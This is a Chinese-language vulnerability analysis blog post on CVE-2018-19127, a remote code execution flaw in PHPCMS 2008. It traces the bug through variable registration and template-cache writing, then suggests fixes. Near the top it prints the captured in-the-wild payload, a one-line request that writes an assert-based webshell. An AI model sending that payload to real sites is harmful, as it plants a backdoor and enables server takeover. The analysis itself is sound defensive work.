<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.4.1" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.4.1">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.4.1">


  <link rel="mask-icon" href="/images/logo.svg?v=6.4.1" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.4.1',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="0x01 前提这个漏洞的起因是阿里云抓到的黑产样本，前台RCE的漏洞，但是PHPCMS 2008这个版本有点老，所以这个漏洞可以用来学习。  阿里云安全于11月5日捕获到该漏洞的多个利用样本，分析后因未联系上PHPCMS官方，已报告给国家信息安全漏洞共享平台，且在cve公共漏洞库中编号为CVE-2018-19127。">
<meta name="keywords" content="php,rce">
<meta property="og:type" content="article">
<meta property="og:title" content="PHPCMS 2008远程代码执行">
<meta property="og:url" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/index.html">
<meta property="og:site_name" content="l1nk3r&#39;s blog">
<meta property="og:description" content="0x01 前提这个漏洞的起因是阿里云抓到的黑产样本，前台RCE的漏洞，但是PHPCMS 2008这个版本有点老，所以这个漏洞可以用来学习。  阿里云安全于11月5日捕获到该漏洞的多个利用样本，分析后因未联系上PHPCMS官方，已报告给国家信息安全漏洞共享平台，且在cve公共漏洞库中编号为CVE-2018-19127。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/1.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/2.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/3.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/4.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/5.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/6.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/7.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/8.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/9.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/10.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/11.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/12.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/13.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/14.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/16.png">
<meta property="og:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/15.png">
<meta property="og:updated_time" content="2018-12-06T11:06:59.679Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHPCMS 2008远程代码执行">
<meta name="twitter:description" content="0x01 前提这个漏洞的起因是阿里云抓到的黑产样本，前台RCE的漏洞，但是PHPCMS 2008这个版本有点老，所以这个漏洞可以用来学习。  阿里云安全于11月5日捕获到该漏洞的多个利用样本，分析后因未联系上PHPCMS官方，已报告给国家信息安全漏洞共享平台，且在cve公共漏洞库中编号为CVE-2018-19127。">
<meta name="twitter:image" content="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/1.png">






  <link rel="canonical" href="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>PHPCMS 2008远程代码执行 | l1nk3r's blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">l1nk3r's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />About</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br />Categories</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-friends">
    <a href="/Friends" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />Friends</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="l1nk3r">
      <meta itemprop="description" content="愿你出走半生，归来仍是少年">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="l1nk3r's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">PHPCMS 2008远程代码执行
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-12-06 19:03:52 / Modified: 19:06:59" itemprop="dateCreated datePublished" datetime="2018-12-06T19:03:52+08:00">2018-12-06</time>
            

            
              

              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/漏洞分析/" itemprop="url" rel="index"><span itemprop="name">漏洞分析</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2018/12/06/PHPCMS-2008远程代码执行/" class="leancloud_visitors" data-flag-title="PHPCMS 2008远程代码执行">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Views: </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01-前提"><a href="#0x01-前提" class="headerlink" title="0x01 前提"></a>0x01 前提</h2><p>这个漏洞的起因是阿里云抓到的黑产样本，前台RCE的漏洞，但是PHPCMS 2008这个版本有点老，所以这个漏洞可以用来学习。</p>
<blockquote>
<p>阿里云安全于11月5日捕获到该漏洞的多个利用样本，分析后因未联系上PHPCMS官方，已报告给国家信息安全漏洞共享平台，且在cve公共漏洞库中编号为CVE-2018-19127。</p>
</blockquote>
<a id="more"></a> 
<h2 id="0x02-分析"><a href="#0x02-分析" class="headerlink" title="0x02 分析"></a>0x02 分析</h2><p>首先先看看捕获到的payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/type.php?template=tag_()&#123;&#125;;@unlink(_FILE_);assert($_POST[<span class="number">1</span>]);&#123;<span class="comment">//../rss</span></span><br></pre></td></tr></table></figure>
<p>看到这个payload，那么漏洞触发点应该在 <strong>type.php</strong> 文件中，话不多说，先看看代码吧。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/1.png" alt="1"></p>
<p>这里的漏洞触发点实际是 <strong>第20行</strong> 的代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span> template(<span class="string">'phpcms'</span>, $template);</span><br></pre></td></tr></table></figure>
<p>根据 <strong>payload</strong> 也就是说需要这里的 <strong>$template</strong> 变量可控。但是实际上代码 <strong>第6行</strong> 已经将 <strong>$template</strong> 变量赋值了一个初始值 <strong>type</strong> ，也就是说这个漏洞实际上是绕过了这个地方的变量赋值。</p>
<p>我们先看为啥会绕过变量赋值，看到开头包含了一个 <strong>/include/common.inc.php</strong> ，我寻思应该绕过部分的问题出在了这个文件里，跟进一下。在 <strong>/include/common.inc.php:58</strong> 找到了问题所在，我们来看一下 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_REQUEST)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">if</span>(MAGIC_QUOTES_GPC)</span><br><span class="line">&#123;</span><br><span class="line">$_REQUEST = new_stripslashes($_REQUEST);</span><br><span class="line"><span class="keyword">if</span>($_COOKIE) $_COOKIE = new_stripslashes($_COOKIE);</span><br><span class="line">extract($db-&gt;escape($_REQUEST), EXTR_SKIP);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">$_POST = $db-&gt;escape($_POST);</span><br><span class="line">$_GET = $db-&gt;escape($_GET);</span><br><span class="line">$_COOKIE = $db-&gt;escape($_COOKIE);</span><br><span class="line">@extract($_POST,EXTR_SKIP);</span><br><span class="line">@extract($_GET,EXTR_SKIP);</span><br><span class="line">@extract($_COOKIE,EXTR_SKIP);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这部分代码的主要作用是接收到请求的时候判断是否开启了 <strong>MAGIC_QUOTES_GPC</strong> 方法，没有的话，针对 <strong>$_GET</strong> 、 <strong>$_POST</strong> 、 <strong>$_COOKIE</strong> 等数组进行处理，然后使用 <strong>extract</strong> 函数，这个函数的作用就是用来注册变量，但是 <strong>EXTR_SKIP</strong> 作用是如果有冲突，不覆盖已有的变量。而我们知道针对 <strong>$template</strong> 实现判断它是否不为空，如果为空才赋值给它一个初始值 <strong>type</strong> ，也就是说我们可以注册 <strong>$template</strong> 变量的值，来让它不为空，从而绕过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">empty</span>($template)) $template = <span class="string">'type'</span>;</span><br></pre></td></tr></table></figure>
<p>好了 <strong>$template</strong> 变量可控的原理找到了之后，我们继续看看漏洞触发原因。</p>
<p>这里我们跟进一下 <strong>template</strong> 函数，相关函数出现在 <strong>include/global.func.php:772</strong> ，我们看一下实际代码。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/2.png" alt="2"></p>
<p>我们看到 <strong>第二行</strong> 存在一个常量 <strong>TPL_CACHEPATH</strong> ，跟进一下这个常量的定义，相关位置在 <strong>include/config.inc.php:56</strong> 。也就是说这个常量的实际作用是定义了模版的缓存物理路径。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/3.png" alt="2"></p>
<p>然后我们继续往下看，<strong>第4行</strong> if判断中也有一个常量 <strong>TPL_REFRESH</strong> ，跟进一下这个常量定义，相关位置在 <strong>include/config.inc.php:57</strong>。这个常量用来判断模版缓存是否自动更新，默认值是1。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/4.png" alt="2"></p>
<p>然后实际上这个 <strong>if判断</strong> 里剩下的内容就是判断文件是否存在，以及一些修改时间的判断。这里如果这个if语句做的是逻辑的与运算，换句话来说if判断中的 <strong>两个条件必须都成立</strong> 的情况下才能进入到这个循环体中进行相关操作。换句话来说，也就是该系统不能将模版缓存自动更新功能关闭，恰巧该功能是默认值为1。</p>
<p>那我们继续往下看，看看这个if条件达成之后，会继续做什么操作，相关代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require_once</span> PHPCMS_ROOT.<span class="string">'include/template.func.php'</span>;</span><br><span class="line">template_compile($module, $template, $istag);</span><br></pre></td></tr></table></figure>
<p>这里如果进入if语句之后，会先包含 <strong>include/template.func.php</strong> 这个文件，在调用 <strong>template_compile</strong> 函数。继续跟进 <strong>template_compile</strong> 函数，相关函数位置在 <strong>include/template.func.php:2</strong> </p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/5.png" alt="5"></p>
<p>这里我们看到了一个很直观的函数 <strong>file_put_contents</strong> ，这个函数经常会导致任意文件写入的漏洞。也就是说如果 <strong>第13行</strong> 代码中的 <strong>$content</strong> 可控的情况下就会导致任意文件写入的问题。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$content = ($istag || substr($template, <span class="number">0</span>, <span class="number">4</span>) == <span class="string">'tag_'</span>) ? <span class="string">'&lt;?php function _tag_'</span>.$module.<span class="string">'_'</span>.$template.<span class="string">'($data, $number, $rows, $count, $page, $pages, $setting)&#123; global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?&gt;'</span>.template_parse($content, <span class="number">1</span>).<span class="string">'&lt;?php &#125; ?&gt;'</span> : template_parse($content);</span><br></pre></td></tr></table></figure>
<p>这里进行了逻辑与运算，原来 <strong>$istag</strong> 初始化了为0，也就是 <strong>substr($template, 0, 4) == ‘tag_’</strong> 的结果必须为true。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$content = ($istag || substr($template, <span class="number">0</span>, <span class="number">4</span>) == <span class="string">'tag_'</span>)</span><br></pre></td></tr></table></figure>
<p>要使得 <strong>substr($template, 0, 4) == ‘tag_’</strong> 的结果必须为true，很简单，只需要 <strong>$template</strong> 变量中以 <strong>tag_</strong> 开头。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/6.png" alt="6"></p>
<p>我们回过头梳理一下过程。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/7.png" alt="7"></p>
<h2 id="0x03-动态分析"><a href="#0x03-动态分析" class="headerlink" title="0x03 动态分析"></a>0x03 动态分析</h2><p>这里可以看到传入 <strong>template=tag_(){};@unlink(FILE);assert($_POST[1]);{//../rss</strong> ，这里的 <strong>$template</strong> 通过变量注册已经不会再赋值初始值 <strong>type</strong> 了。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/8.png" alt="8"></p>
<p>我们看到 <strong>$template</strong> 已经传入到漏洞触发点了。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/9.png" alt="8"></p>
<p>然后我们可以看到这里的 <strong>$compiledtplfile</strong> 变量通过赋值 <strong>payload</strong> 实际上是判断了 <strong>data/cache_template/rss.tpl.php</strong> 文件是否存在。而实际上确实该文件不存在，所以这里的if判断过去了，并且成功将 <strong>$template</strong> 带入到 <strong>template_compile</strong> 函数中了。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/10.png" alt="8"></p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/11.png" alt="11"></p>
<p>这里我们可以看到 <strong>template_compile</strong> 函数中利用payload成功经过了 <strong>$content</strong> 变量的判断，并且将 <strong>$template</strong> 的内容写到了<strong>data/cache_template/rss.tpl.php</strong> 文件中。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/12.png" alt="11"></p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/13.png" alt="13"></p>
<h2 id="0x04-修复建议"><a href="#0x04-修复建议" class="headerlink" title="0x04 修复建议"></a>0x04 修复建议</h2><p>临时最简单直接的修复建议就是把 <strong>TPL_REFRESH</strong> 的定义改成 <strong>0</strong> 。当然这样修改之后会导致功能无法使用。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/14.png" alt="14"></p>
<p>当然也可以更新到最新。</p>
<h2 id="0x05-后记"><a href="#0x05-后记" class="headerlink" title="0x05 后记"></a>0x05 后记</h2><p>由于这个漏洞环境因为mysql版本的问题，他默认数据文件是的type=，需要替换成ENGINE=，这样才能用。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/16.png" alt="15"></p>
<p>我已经修改<a href="http://www.lmxspace.com/phpcms.zip">好了一稿</a>，但是还是有点问题，有需要的时候安装的时候可以不要勾选下图这个广告模块数据，一样可以用来复现。不得不说，务实派的黑产感觉永远走在技术应用的最前端。</p>
<p><img src="/2018/12/06/PHPCMS-2008远程代码执行/15.png" alt="15"></p>

      
    </div>

    

    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>l1nk3r</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/" title="PHPCMS 2008远程代码执行">http://www.lmxspace.com/2018/12/06/PHPCMS-2008远程代码执行/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/php/" rel="tag"><i class="fa fa-tag"></i> php</a>
          
            <a href="/tags/rce/" rel="tag"><i class="fa fa-tag"></i> rce</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/10/关于WAF的那些事/" rel="next" title="关于WAF的那些事">
                <i class="fa fa-chevron-left"></i> 关于WAF的那些事
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/12/12/Thinkphp-5-0远程代码执行漏洞/" rel="prev" title="Thinkphp 5.0远程代码执行漏洞">
                Thinkphp 5.0远程代码执行漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="l1nk3r" />
            
              <p class="site-author-name" itemprop="name">l1nk3r</p>
              <p class="site-description motion-element" itemprop="description">愿你出走半生，归来仍是少年</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">32</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">10</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">29</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/sukaralin" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:sukaralin@gmail.com" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://weibo.com/SukaraLin" target="_blank" title="Weibo"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                  
                </span>
              
            </div>
          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-前提"><span class="nav-text">0x01 前提</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-分析"><span class="nav-text">0x02 分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-动态分析"><span class="nav-text">0x03 动态分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-修复建议"><span class="nav-text">0x04 修复建议</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-后记"><span class="nav-text">0x05 后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">l1nk3r</span>

  

  
</div>








        








        
      </div>
    </footer>

    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.4.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.1"></script>



  



  










  





  

  
  <script>
    
    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();

      Counter('get', '/classes/Counter', { where: JSON.stringify({ url }) })
        .done(function ({ results }) {
          if (results.length > 0) {
            var counter = results[0];
            
              var $element = $(document.getElementById(url));
              $element.find('.leancloud-visitors-count').text(counter.time + 1);
            
            Counter('put', `/classes/Counter/${counter.objectId}`, JSON.stringify({ time: { "__op":"Increment", "amount":1 } }))
            
            .fail(function ({ responseJSON }) {
                console.log('Failed to save Visitor num, with error message: ' + responseJSON.error);
            })
          } else {
            
              Counter('post', '/classes/Counter', JSON.stringify({ title: title, url: url, time: 1}))
                .done(function () {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(1);
                })
                .fail(function () {
                  console.log('Failed to create');
                });
            
          }
        })
      .fail(function ({ responseJSON }) {
        console.log('LeanCloud Counter Error:' + responseJSON.code + " " + responseJSON.error);
      });
    }
    

    $(function() {
      $.get('https://app-router.leancloud.cn/2/route?appId=' + "B9FGnsb12m0SgeUt1Ks30osH-gzGzoHsz")
        .done(function ({ api_server }) {
          var Counter = function (method, url, data) {
            return $.ajax({
              method: method,
              url: `https://${api_server}/1.1${url}`,
              headers: {
                'X-LC-Id': "B9FGnsb12m0SgeUt1Ks30osH-gzGzoHsz",
                'X-LC-Key': "VJzXbdTqOCo8jcVFjXNw7fRX",
                'Content-Type': 'application/json',
              },
              data: data,
            });
          };
          
          addCount(Counter);
          
        })
    });
  </script>



  

  

  

  
  

  

  

  

  

  

</body>
</html>
<!-- 页面点击小红心 --> <script type="text/javascript" src="/js/src/love.js"></script>
